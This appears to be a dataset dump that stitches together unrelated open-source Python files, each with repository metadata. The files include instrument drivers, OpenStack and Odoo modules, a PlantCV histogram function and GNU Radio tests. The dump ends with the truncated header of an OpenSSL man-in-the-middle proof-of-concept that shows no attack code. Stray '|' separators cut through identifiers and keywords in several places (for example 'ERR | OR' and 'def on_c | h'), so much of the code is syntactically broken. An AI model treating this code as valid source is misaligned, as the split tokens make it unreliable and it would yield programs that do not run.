ivi/tektronix/tektronixMDO3012.py
|
Python
|
mit
| 1,724
| 0.00116
|
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2016 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHA
|
LL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .tektronixMDO3000 import *
class tektronixMDO3012(tektronixMDO3000):
"Tektronix MDO3012 IVI oscilloscope driver"
def __init__(self, *args, **kwargs):
|
self.__dict__.setdefault('_instrument_id', 'MDO3012')
super(tektronixMDO3012, self).__init__(*args, **kwargs)
self._analog_channel_count = 2
self._digital_channel_count = 16
self._channel_count = self._analog_channel_count + self._digital_channel_count
self._bandwidth = 100e6
# AFG option
self._output_count = 1
self._init_channels()
self._init_outputs()
|
fcurella/django-settings_inspector
|
settings_inspector/gui/windows/variables.py
|
Python
|
mit
| 1,500
| 0.000667
|
from .base import ScrollWindow
from settings_inspector.gui import keys
class VariablesWindow(ScrollWindow):
def __init__(self, settings, *args, **kwargs):
super(VariablesWindow, self).__init__(*args, **
|
kwargs)
self.root_settings = settings
self.reset()
self.render()
return self
def reset(self):
self.settings = {}
self.current_line = 0
self.current_column = 0
self.add_variables()
self.refresh()
def add_variables(self):
for name, variable in self.root_settings.variable_registry.variables.items():
self.write(u"%s = %s" % (variable.name, variable.value))
self.next_line()
def on_c
|
h(self, cmd):
if cmd == keys.LOWERCASE_S:
self.parent_ui.show_settings()
else:
super(VariablesWindow, self).on_ch(cmd)
class VariableHistoryWindow(ScrollWindow):
def __init__(self, settings, variable, *args, **kwargs):
super(VariableHistoryWindow, self).__init__(*args, **kwargs)
self.root_settings = settings
self.variable = variable
self.reset()
self.render()
return self
def reset(self):
self.settings = {}
self.current_line = 0
self.current_column = 0
self.add_variable()
self.refresh()
def add_variable(self):
for assignment in self.variable.assignment:
self.write(u"%s" % (assignment))
self.next_line()
|
jmluy/xpython
|
exercises/concept/log-levels/.meta/exemplar.py
|
Python
|
mit
| 1,610
| 0.001242
|
from enum import Enum
class LogLevel(Enum):
"""Represent different log levels by their verbose codes."""
TRACE = 'TRC'
DEBUG = 'DBG'
INFO = 'INF'
WARNING = 'WRN'
WARN = 'WRN'
ERROR = 'ERR'
FATAL = 'FTL'
UNKNOWN = 'UKN'
class LogLevelInt(Enum):
"""Represent different log levels by their short codes."""
TRACE = 0
DEBUG = 1
INFO = 4
WARNING = 5
WARN = 5
ERR
|
OR = 6
FATAL = 7
UNKNOWN = 42
def parse_log_level(message):
"""Return level enum for log message.
:param message: log message (string)
:return: enum - 'LogLevel.<level>'. Return 'LogLevel.Unknown' if an unknown severity is passed.
"""
str_split = message.split(':')
lvl = str_split[0][1:-1]
if lvl in [level.value for level in LogLevel]:
return LogLevel(lvl)
return LogLevel('UKN')
def convert_to_short_log(log_level, message):
|
"""Convert a log message to its shorter format.
:param log_level: enum - 'LogLevel.<level>' e.g. 'LogLevel.Error'
:param message: str - log message
:return: enum - 'LogLevelInt.<value>` e.g. 'LogLevelInt.5'
"""
return f'{LogLevelInt[log_level.name].value}:{message}'
def get_warn_alias():
"""Returns the enum for LogLevel.Warning.
:return: enum - 'LogLevel'.<alias>'
"""
return LogLevel('WRN')
def get_members():
"""Return all members of the enum.
:return: list of tuples - [(name1, value1), (name2, value2)]
"""
out_list = []
for member in LogLevel:
out_list.append((member.name, member.value))
return out_list
|
eharney/nova
|
nova/tests/api/openstack/compute/plugins/v3/test_multinic.py
|
Python
|
apache-2.0
| 5,154
| 0
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from nova import compute
from nova.openstack.common import jsonutils
from nova import test
from nova.tests.api.openstack import fakes
UUID = '70f6db34-de8d-4fbd-aafb-4065bdfa6114'
last_add_fixed_ip = (None, None)
last_remove_fixed_ip = (None, None)
def compute_api_add_fixed_ip(self, context, instance, network_id):
global last_add_fixed_ip
last_add_fixed_ip = (instance['uuid'], network_id)
def compute_api_remove_fixed_ip(self, context, instance, address):
global last_remove_fixed_ip
last_remove_fixed_ip = (instance['uuid'], address)
def compute_api_get(self, context, instance_id, expected_attrs=None,
want_objects=False):
return {'id': 1, 'uuid': instance_id}
class FixedIpTest(test.NoDBTestCase):
def setUp(self):
super(FixedIpTest, self).setUp()
fakes.stub_out_networking(self.stubs)
fakes.stub_out_rate_limiting(self.stubs)
self.stubs.Set(compute.api.API, "add_fixed_ip",
compute_api_add_fixed_ip)
self.stubs.Set(compute.api.API, "remove_fixed_ip",
compute_api_remove_fixed_ip)
self.stubs.Set(compute.api.API, 'get', compute_api_get)
self.app = fakes.wsgi_app_v3(init_only=('servers', 'os-multinic'))
def test_add_fixed_ip(self):
global last_add_fixed_ip
last_add_fixed_ip = (None, None)
body = dict(add_fixed_ip=dict(network_id='test_net'))
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
self.assertEqual(last_add_fixed_ip, (UUID, 'test_net'))
def test_add_fixed_ip_empty_network_id(self):
body = {'add_fixed_ip': {'network_id': ''}}
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(400, resp.status_int)
|
def test_add_fixed_ip_network_id_bigger_than_36(self):
body = {'add_fixed_ip': {'network_id': 'a' * 37}}
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(400, resp.status_int)
def test_add_fixed_ip_no_network
|
(self):
global last_add_fixed_ip
last_add_fixed_ip = (None, None)
body = dict(add_fixed_ip=dict())
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual(last_add_fixed_ip, (None, None))
def test_remove_fixed_ip(self):
global last_remove_fixed_ip
last_remove_fixed_ip = (None, None)
body = dict(remove_fixed_ip=dict(address='10.10.10.1'))
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 202)
self.assertEqual(last_remove_fixed_ip, (UUID, '10.10.10.1'))
def test_remove_fixed_ip_invalid_address(self):
body = {'remove_fixed_ip': {'address': ''}}
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(400, resp.status_int)
def test_remove_fixed_ip_no_address(self):
global last_remove_fixed_ip
last_remove_fixed_ip = (None, None)
body = dict(remove_fixed_ip=dict())
req = webob.Request.blank('/v3/servers/%s/action' % UUID)
req.method = 'POST'
req.body = jsonutils.dumps(body)
req.headers['content-type'] = 'application/json'
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual(last_remove_fixed_ip, (None, None))
|
rickerc/ceilometer_audit
|
ceilometer/publisher/file.py
|
Python
|
apache-2.0
| 3,579
| 0
|
# -*- encoding: utf-8 -*-
#
# Copyright 2013 IBM Corp
#
# Author: Tong Li <litong01@us.ibm.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import logging.handlers
import urlparse
from ceilometer import publisher
from ceilometer.openstack.common import log
LOG = log.getLogger(__name__)
class FilePublisher(publisher.PublisherBase):
"""Publisher metering data to file.
The publisher which records metering data into a file. The file name and
location should be configured in ceilometer pipeline configuration file.
If a file name and location is not specified, this File Publisher will not
log any meters other than log a warning in Ceilometer log file.
To enable this publisher, add the following section to file
/etc/ceilometer/publisher.yaml or simply add it to an existing pipeline.
-
name: meter_file
interval: 600
counters:
- "*"
transformers:
publishers:
- file:///var/test?max_bytes=10000000&backup_count=5
File path is required for this publisher to work properly. If max_bytes
or backup_count is missing, FileHandler will be used to save the metering
data. If max_bytes and backup_count are present, RotatingFileHandler will
be used to save the metering data.
"""
def __init__(self, parsed_url):
super(FilePublisher, self).__init__(parsed_url)
self.publisher_logger = None
path = parsed_url.path
if not path or path.lower() == 'file':
LOG.error('The
|
path for the file publisher is required')
return
rfh = None
max_bytes = 0
backup_count = 0
# Handling other configuration options in the query string
if parsed_url.query:
params = urlparse.parse_qs(parsed_url.query)
if params.get('max_bytes') and params.get('backup_count'):
try:
max_bytes = int(params.get('max_bytes')[0])
backup_count
|
= int(params.get('backup_count')[0])
except ValueError:
LOG.error('max_bytes and backup_count should be '
'numbers.')
return
# create rotating file handler
rfh = logging.handlers.RotatingFileHandler(
path, encoding='utf8', maxBytes=max_bytes,
backupCount=backup_count)
self.publisher_logger = logging.Logger('publisher.file')
self.publisher_logger.propagate = False
self.publisher_logger.setLevel(logging.INFO)
rfh.setLevel(logging.INFO)
self.publisher_logger.addHandler(rfh)
def publish_samples(self, context, samples):
"""Send a metering message for publishing
:param context: Execution context from the service or RPC call
:param samples: Samples from pipeline after transformation
"""
if self.publisher_logger:
for sample in samples:
self.publisher_logger.info(sample.as_dict())
|
stiphyMT/plantcv
|
plantcv/plantcv/visualize/histogram.py
|
Python
|
mit
| 6,304
| 0.002855
|
# Plot histogram
import os
import numpy as np
from plantcv.plantcv.threshold import binary as binary_threshold
from plantcv.plantcv import params
from plantcv.plantcv import fatal_error
from plantcv.plantcv._debug import _debug
import pandas as pd
from plotnine import ggplot, aes, geom_line, labels, scale_color_manual
def _hist_gray(gray_img, bins, lower_bound, upper_bound, mask=None):
""" Prepare the ready to plot histogram data
Inputs:
gray_img = grayscale image to analyze
bins = divide the data into n evenly spaced bins
lower_bound = the lower bound of the bins (x-axis min value)
upper_bound = the upper bound of the bins (x-axis max value)
mask = binary mask, calculate histogram from masked area only (default=None)
Returns:
bin_labels = an array of histogram bin labels
hist_percent = an array of histogram represented by percent values
hist_gray_data = an array of histogram (original values)
:param gray_img: numpy.ndarray
:param bins: int
:param lower_bound: int
:param upper_bound: int
:param mask: numpy.ndarray
:return bin_labels: numpy.ndarray
:return hist_percent: numpy.ndarray
:return hist_gray_data: numpy.ndarray
"""
params.device += 1
debug = params.debug
# Ap
|
ply mask if one is supplied
if mask is not None:
min_val = np.min(gray_img)
pixels = len(np.where(mask > 0)[0])
# apply plant shaped m
|
ask to image
params.debug = None
mask1 = binary_threshold(mask, 0, 255, 'light')
mask1 = (mask1 / 255)
masked = np.where(mask1 != 0, gray_img, min_val - 5000)
else:
pixels = gray_img.shape[0] * gray_img.shape[1]
masked = gray_img
params.debug = debug
# Store histogram data
hist_gray_data, hist_bins = np.histogram(masked, bins, (lower_bound, upper_bound))
# make hist percentage for plotting
hist_percent = (hist_gray_data / float(pixels)) * 100
# use middle value of every bin as bin label
bin_labels = np.array([np.average([hist_bins[i], hist_bins[i+1]]) for i in range(0, len(hist_bins) - 1)])
return bin_labels, hist_percent, hist_gray_data
# hist_data = pd.DataFrame({'pixel intensity': bin_labels, 'proportion of pixels (%)': hist_percent})
# return hist_data
def histogram(img, mask=None, bins=100, lower_bound=None, upper_bound=None, title=None, hist_data=False):
"""Plot histograms of each input image channel
Inputs:
img = an RGB or grayscale image to analyze
mask = binary mask, calculate histogram from masked area only (default=None)
bins = divide the data into n evenly spaced bins (default=100)
lower_bound = the lower bound of the bins (x-axis min value) (default=None)
upper_bound = the upper bound of the bins (x-axis max value) (default=None)
title = a custom title for the plot (default=None)
hist_data = return the frequency distribution data if True (default=False)
Returns:
fig_hist = histogram figure
hist_df = dataframe with histogram data, with columns "pixel intensity" and "proportion of pixels (%)"
:param img: numpy.ndarray
:param mask: numpy.ndarray
:param bins: int
:param lower_bound: int
:param upper_bound: int
:param title: str
:param hist_data: bool
:return fig_hist: plotnine.ggplot.ggplot
:return hist_df: pandas.core.frame.DataFrame
"""
if not isinstance(img, np.ndarray):
fatal_error("Only image of type numpy.ndarray is supported input!")
if len(img.shape) < 2:
fatal_error("Input image should be at least a 2d array!")
if mask is not None:
masked = img[np.where(mask > 0)]
img_min, img_max = np.nanmin(masked), np.nanmax(masked)
else:
img_min, img_max = np.nanmin(img), np.nanmax(img)
# for lower / upper bound, if given, use the given value, otherwise, use the min / max of the image
lower_bound = lower_bound if lower_bound is not None else img_min
upper_bound = upper_bound if upper_bound is not None else img_max
if len(img.shape) > 2:
if img.shape[2] == 3:
b_names = ['blue', 'green', 'red']
else:
b_names = [str(i) for i in range(img.shape[2])]
if len(img.shape) == 2:
bin_labels, hist_percent, hist_ = _hist_gray(img, bins=bins, lower_bound=lower_bound, upper_bound=upper_bound,
mask=mask)
hist_df = pd.DataFrame(
{'pixel intensity': bin_labels, 'proportion of pixels (%)': hist_percent, 'hist_count': hist_,
'color channel': ['0' for _ in range(len(hist_percent))]})
else:
# Assumption: RGB image
# Initialize dataframe column arrays
px_int = np.array([])
prop = np.array([])
hist_count = np.array([])
channel = []
for (b, b_name) in enumerate(b_names):
bin_labels, hist_percent, hist_ = _hist_gray(img[:, :, b], bins=bins, lower_bound=lower_bound,
upper_bound=upper_bound, mask=mask)
# Append histogram data for each channel
px_int = np.append(px_int, bin_labels)
prop = np.append(prop, hist_percent)
hist_count = np.append(hist_count, hist_)
channel = channel + [b_name for _ in range(len(hist_percent))]
# Create dataframe
hist_df = pd.DataFrame(
{'pixel intensity': px_int, 'proportion of pixels (%)': prop, 'hist_count': hist_count,
'color channel': channel})
fig_hist = (ggplot(data=hist_df,
mapping=aes(x='pixel intensity', y='proportion of pixels (%)', color='color channel'))
+ geom_line())
if title is not None:
fig_hist = fig_hist + labels.ggtitle(title)
if len(img.shape) > 2 and img.shape[2] == 3:
fig_hist = fig_hist + scale_color_manual(['blue', 'green', 'red'])
# Plot or print the histogram
_debug(visual=fig_hist, filename=os.path.join(params.debug_outdir, str(params.device) + '_hist.png'))
if hist_data is True:
return fig_hist, hist_df
return fig_hist
|
orchidinfosys/odoo
|
addons/account/models/partner.py
|
Python
|
gpl-3.0
| 22,069
| 0.006434
|
# -*- coding: utf-8 -*-
from operator import itemgetter
import time
from openerp import api, fields, models, _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
from openerp.exceptions import ValidationError
class AccountFiscalPosition(models.Model):
_name = 'account.fiscal.position'
_description = 'Fiscal Position'
_order = 'sequence'
sequence = fields.Integer()
name = fields.Char(string='Fiscal Position', required=True)
active = fields.Boolean(default=True,
help="By unchecking the active field, you may hide a fiscal position without deleting it.")
company_id = fields.Many2one('res.company', string='Company')
account_ids = fields.One2many('account.fiscal.position.account', 'position_id', string='Account Mapping', copy=True)
tax_ids = fields.One2many('account.fiscal.position.tax', 'position_id', string='Tax Mapping', copy=True)
note = fields.Text('Notes')
auto_apply = fields.Boolean(string='Detect Automatically', help="Apply automatically this fiscal position.")
vat_required = fields.Boolean(string='VAT required', help="Apply only if partner has a VAT number.")
country_id = fields.Many2one('res.country', string='Country',
help="Apply only if delivery or invoicing country match.")
country_group_id = fields.Many2one('res.country.group', string='Country Group',
help="Apply only if delivery or invocing country match the group.")
state_ids = fields.Many2many('res.country.state', string='Federal States')
zip_from = fields.Integer(string='Zip Range From', default=0)
zip_to = fields.Integer(string='Zip Range To', default=0)
# To be used in hiding the 'Federal States' field('attrs' in view side) when selected 'Country' has 0 states.
states_count = fields.Integer(compute='_compute_states_count')
@api.one
def _compute_states_count(self):
self.states_count = len(self.country_id.state_ids)
@api.one
@api.constrains('zip_from', 'zip_to')
def _check_zip(self):
if self.zip_from > self.zip_to:
raise ValidationError(_('Invalid "Zip Range", please configure it properly.'))
return True
@api.v7
def map_tax(self, cr, uid, fposition_id, taxes, context=None):
if not taxes:
return []
if not fposition_id:
return map(lambda x: x.id, taxes)
result = set()
for t in taxes:
ok = False
for tax in fposition_id.tax_ids:
if tax.tax_src_id.id == t.id:
if tax.tax_dest_id:
result.add(tax.tax_dest_id.id)
ok = True
if not ok:
result.add(t.id)
return list(result)
@api.v8 # noqa
def map_tax(self, taxes):
result = self.env['account.tax'].browse()
for tax in taxes:
tax_count = 0
for t in self.tax_ids:
if t.tax_src_id == tax:
tax_count += 1
if t.tax_dest_id:
result |= t.tax_dest_id
if not tax_count:
result |= tax
return result
@api.v7
def map_account(self, cr, uid, fposition_id, account_id, context=None):
if not fposition_id:
return account_id
for pos in fposition_id.account_ids:
if pos.account_src_id.id == account_id:
account_id = pos.account_dest_id.id
break
return account_id
@api.v8
def map_account(self, account):
for pos in self.account_ids:
if pos.account_src_id == account:
return pos.account_dest_id
return account
@api.v8
def map_accounts(self, accounts):
""" Receive a dictionary having accounts in values and try to replace those accounts accordingly to the fiscal position.
"""
ref_dict = {}
for line in self.account_ids:
ref_dict[line.account_src_id] = line.account_dest_id
for key, acc in accounts.items():
if acc in ref_dict:
accounts[key] = ref_dict[acc]
return accounts
@api.onchange('country_id')
def _onchange_country_id(self):
if self.country_id:
self.zip_from = self.zip_to = self.country_group_id = False
self.state_ids = [(5,)]
self.states_count = len(self.country_id.state_ids)
@api.onchange('country_group_id')
def _onchange_country_group_id(self):
if self.country_group_id:
self.zip_from = self.zip_to = self.country_id = False
self.state_ids = [(5,)]
@api.model
def _get_fpos_by_region(self, country_id=False, state_id=False, zipcode=False, vat_required=False):
if not country_id:
return False
base_domain = [('auto_apply', '=', True), ('vat_required', '=', vat_required)]
null_state_dom = state_domain = [('state_ids', '=', False)]
null_zip_dom = zip_domain = [('zip_from', '=', 0), ('zip_to', '=', 0)]
null_country_dom = [('country_id', '=', False), ('country_group_id', '=', False)]
if zipcode and zipcode.isdigit():
zipcode = int(zipcode)
zip_domain = [('zip_from', '<=', zipcode), ('zip_to', '>=', zipcode)]
else:
zipcode = 0
if state_id:
state_domain = [('state_ids', '=', state_id)]
domain_country = base_domain + [('country_id', '=', country_id)]
domain_group = base_domain + [('country_group_id.country_ids', '=', country_id)]
# Build domain to search records with exact matching criteria
fpos = self.search(domain_country + state_domain + zip_domain, limit=1)
# return records that fit the most the criteria, and fallback on less specific fiscal positions if any can be found
if not fpos and state_id:
fpos = self.search(domain_country + null_state_dom + zip_domain, limit=1)
if not fpos and zipcode:
fpos = self.search(domain_country + state_domain + null_zip_dom, limit=1)
if not fpos and state_id and zipcode:
|
fpos = self.search(domain_country + null_state_
|
dom + null_zip_dom, limit=1)
# fallback: country group with no state/zip range
if not fpos:
fpos = self.search(domain_group + null_state_dom + null_zip_dom, limit=1)
if not fpos:
# Fallback on catchall (no country, no group)
fpos = self.search(base_domain + null_country_dom, limit=1)
return fpos or False
@api.model
def get_fiscal_position(self, partner_id, delivery_id=None):
if not partner_id:
return False
# This can be easily overriden to apply more complex fiscal rules
PartnerObj = self.env['res.partner']
partner = PartnerObj.browse(partner_id)
# if no delivery use invoicing
if delivery_id:
delivery = PartnerObj.browse(delivery_id)
else:
delivery = partner
# partner manually set fiscal position always win
if delivery.property_account_position_id or partner.property_account_position_id:
return delivery.property_account_position_id.id or partner.property_account_position_id.id
# First search only matching VAT positions
vat_required = bool(partner.vat)
fp = self._get_fpos_by_region(delivery.country_id.id, delivery.state_id.id, delivery.zip, vat_required)
# Then if VAT required found no match, try positions that do not require it
if not fp and vat_required:
fp = self._get_fpos_by_region(delivery.country_id.id, delivery.state_id.id, delivery.zip, False)
return fp.id if fp else False
class AccountFiscalPositionTax(models.Model):
_name = 'account.fiscal.position.tax'
_description = 'Taxes Fiscal Position'
_rec_name = 'position_id'
position_id = fields.Many2one('account.fiscal.position', string='Fiscal Position',
required=True, ondelete='cascade')
tax_src_id = fields.Many2one('account.tax', string='Tax on Product', required=True)
tax_dest_id
|
fajoy/nova
|
nova/cells/manager.py
|
Python
|
apache-2.0
| 9,098
| 0.000879
|
# Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Cells Service Manager
"""
import datetime
import time
from nova.cells import messaging
from nova.cells import state as cells_state
from nova.cells import utils as cells_utils
from nova import context
from nova import exception
from nova import manager
from nova.openstack.common import cfg
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
cell_manager_opts = [
cfg.StrOpt('driver',
default='nova.cells.rpc_driver.CellsRPCDriver',
help='Cells communication driver to use'),
cfg.IntOpt("instance_updated_at_threshold",
default=3600,
help="Number of seconds after an instance was updated "
"or deleted to continue to update cells"),
cfg.IntOpt("instance_update_num_instances",
default=1,
help="Number of instances to update per periodic task run")
]
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(cell_manager_opts, group='cells')
class CellsManager(manager.Manager):
"""The nova-cells manager class. This class defines RPC
methods that the local cell may call. This class is NOT used for
messages coming from other cells. That communication is
driver-specific.
Communication to other cells happens via the messaging module. The
MessageRunner from that module will handle routing the message to
the correct cell via the communications driver. Most methods below
create 'targeted' (where we want to route a message to a specific cell)
or 'broadcast' (where we want a message to go to multiple cells)
messages.
Scheduling requests get passed to the scheduler class.
"""
RPC_API_VERSION = '1.0'
def __init__(self, *args, **kwargs):
# Mostly for tests.
cell_state_manager = kwargs.pop('cell_state_manager', None)
super(CellsManager, self).__init__(*args, **kwargs)
if cell_state_manager is None:
cell_state_manager = cells_state.CellStateManager
self.state_manager = cell_state_manager()
self.msg_runner = messaging.MessageRunner(self.state_manager)
cells_driver_cls = importutils.import_class(
CONF.cells.driver)
self.driver = cells_driver_cls()
self.instances_to_heal = iter([])
def
|
post_start_hook(self):
"""Have the driver start its consumers for inter-cell communication.
Also ask our child cells for their capacities and capabilit
|
ies so
we get them more quickly than just waiting for the next periodic
update. Receiving the updates from the children will cause us to
update our parents. If we don't have any children, just update
our parents immediately.
"""
# FIXME(comstud): There's currently no hooks when services are
# stopping, so we have no way to stop consumers cleanly.
self.driver.start_consumers(self.msg_runner)
ctxt = context.get_admin_context()
if self.state_manager.get_child_cells():
self.msg_runner.ask_children_for_capabilities(ctxt)
self.msg_runner.ask_children_for_capacities(ctxt)
else:
self._update_our_parents(ctxt)
@manager.periodic_task
def _update_our_parents(self, ctxt):
"""Update our parent cells with our capabilities and capacity
if we're at the bottom of the tree.
"""
self.msg_runner.tell_parents_our_capabilities(ctxt)
self.msg_runner.tell_parents_our_capacities(ctxt)
@manager.periodic_task
def _heal_instances(self, ctxt):
"""Periodic task to send updates for a number of instances to
parent cells.
On every run of the periodic task, we will attempt to sync
'CONF.cells.instance_update_num_instances' number of instances.
When we get the list of instances, we shuffle them so that multiple
nova-cells services aren't attempting to sync the same instances
in lockstep.
If CONF.cells.instance_update_at_threshold is set, only attempt
to sync instances that have been updated recently. The CONF
setting defines the maximum number of seconds old the updated_at
can be. Ie, a threshold of 3600 means to only update instances
that have modified in the last hour.
"""
if not self.state_manager.get_parent_cells():
# No need to sync up if we have no parents.
return
info = {'updated_list': False}
def _next_instance():
try:
instance = self.instances_to_heal.next()
except StopIteration:
if info['updated_list']:
return
threshold = CONF.cells.instance_updated_at_threshold
updated_since = None
if threshold > 0:
updated_since = timeutils.utcnow() - datetime.timedelta(
seconds=threshold)
self.instances_to_heal = cells_utils.get_instances_to_sync(
ctxt, updated_since=updated_since, shuffle=True,
uuids_only=True)
info['updated_list'] = True
try:
instance = self.instances_to_heal.next()
except StopIteration:
return
return instance
rd_context = ctxt.elevated(read_deleted='yes')
for i in xrange(CONF.cells.instance_update_num_instances):
while True:
# Yield to other greenthreads
time.sleep(0)
instance_uuid = _next_instance()
if not instance_uuid:
return
try:
instance = self.db.instance_get_by_uuid(rd_context,
instance_uuid)
except exception.InstanceNotFound:
continue
self._sync_instance(ctxt, instance)
break
def _sync_instance(self, ctxt, instance):
"""Broadcast an instance_update or instance_destroy message up to
parent cells.
"""
if instance['deleted']:
self.instance_destroy_at_top(ctxt, instance)
else:
self.instance_update_at_top(ctxt, instance)
def schedule_run_instance(self, ctxt, host_sched_kwargs):
"""Pick a cell (possibly ourselves) to build new instance(s)
and forward the request accordingly.
"""
# Target is ourselves first.
our_cell = self.state_manager.get_my_state()
self.msg_runner.schedule_run_instance(ctxt, our_cell,
host_sched_kwargs)
def run_compute_api_method(self, ctxt, cell_name, method_info, call):
"""Call a compute API method in a specific cell."""
response = self.msg_runner.run_compute_api_method(ctxt,
cell_name,
method_info,
call)
if call:
return response.value_or_raise()
def instance_update_at_top(self, ctxt, instance):
"""Update an instance at the top level cell."""
self.msg_runner.instance_update_at_top(ctxt, instance)
def instance_destroy_at_top(self, ctxt, instance):
""
|
sanjeevtripurari/hue
|
desktop/core/src/desktop/lib/metrics/file_reporter.py
|
Python
|
apache-2.0
| 2,100
| 0.007619
|
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import tempfile
import threading
from pyformance.reporters.reporter import Reporter
from desktop.lib.metrics import global_registry
LOG = logging.getLogger(__name__)
class FileReporter(Reporter):
def __init__(self, location, *args, **kwargs):
super(FileReporter, self).__init__(*args, **kwargs)
self.location = location
def report_now(self, registry=None, timestamp=None):
dirname = os.path.dirname(self.location)
try:
os.makedirs(dirname)
except OSError:
pass
# Write the metrics to a temporary file, then atomically
# rename the file to the real location.
f = tempfile.NamedTemporaryFile(
dir=dirname,
delete=False)
try:
json.dump(self.registry.dump_metrics(), f)
f.close()
os.rename(f.name, self.location)
except Exception:
os.remove(f.name)
raise
_reporter = None
def start_file_reporter():
from desktop.conf import METRICS
global _reporter
if _reporter is None:
location
|
= METRICS.LOCATION.get()
interval = METRICS.COLLECTION_INTERVAL.get()
if location is not None and interval is not None:
_reporter = FileReporter(
location,
|
reporting_interval=interval / 1000.0,
registry=global_registry())
_reporter.start()
|
mrjacobagilbert/gnuradio
|
gr-vocoder/python/vocoder/qa_g723_24_vocoder.py
|
Python
|
gpl-3.0
| 858
| 0
|
#!/usr/bin/env python
#
# Copyright 2011,2013
|
Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr, gr_unittest, vocoder, blocks
class test_g723_24_vocoder (gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
def tearDown(self):
self.tb = None
def test001_module_load(self):
data = (0, 16, 36, 40, 68, 104, 148, 220, 320, 512)
src = blocks.vector_s
|
ource_s(data)
enc = vocoder.g723_24_encode_sb()
dec = vocoder.g723_24_decode_bs()
snk = blocks.vector_sink_s()
self.tb.connect(src, enc, dec, snk)
self.tb.run()
actual_result = snk.data()
self.assertEqual(list(data), actual_result)
if __name__ == '__main__':
gr_unittest.run(test_g723_24_vocoder)
|
forbidden-ali/Beebeeto-framework
|
demo/openssl_man_in_middle.py
|
Python
|
gpl-2.0
| 9,009
| 0.002612
|
#!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import time
import struct
import random
import socket
import select
import urlparse
from baseframe import BaseFrame
from utils.common.str import hex_dump
class MyPoc(BaseFrame):
poc_info = {
# poc相关信息
'poc': {
'id': 'poc-2014-0014', # 由Beebeeto官方编辑
'name': None, # 名称
'author': 'anonymous', # 作者
'create_date': '2014-07-16', # 编写日期
},
# 协议相关信息
'protocol': {
'name': 'ssl/tls', # 该漏洞所涉及的协议名称
